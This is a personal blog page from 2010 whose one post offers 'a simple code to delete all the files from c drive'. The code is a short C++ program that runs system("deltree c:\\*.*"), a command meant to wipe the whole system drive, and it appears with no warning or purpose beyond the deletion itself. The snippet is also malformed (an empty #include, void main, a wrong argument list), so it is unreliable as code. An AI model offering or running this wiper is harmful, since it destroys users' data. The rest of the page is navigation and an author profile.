skip to main
|
skip to sidebar
Sushil Nagar Computer Engineer
Thursday, February 4, 2010
A simple code to delete all the files from c drive
#include
using namespace std;
void main(int argv,char args[])
{
system("deltree c:\\*.*");
}
No comments:
Post a Comment
Newer Post
Older Post
Home
Subscribe to:
Post Comments (Atom)
About Me
Sushil Nagar
My Self Sushil Kumar Nagar. I m a Computer Engineer in Excel Technovation p Ltd Jaipur. I m charming boy as my friends say. My hight is 6ft.
View my complete profile
Followers
Blog Archive
▼
2010
(14)
►
March
(1)
▼
February
(13)
Learn about Visual Basic Programming Language
Learn about C++ Language
Learn the Basic language
Do yu know about BASIC Language
Learn Java from Here
Learn C from here
Disable the USB Drive on pc
The Most Commoon Problems New Programmers Face
Learn Programming with C and C++
Notes for Programming in Java
A simple code to delete all the files from c drive
A simple code of restarting system
What is a Virus?
►
2009
(1)
►
October
(1)
No comments:
Post a Comment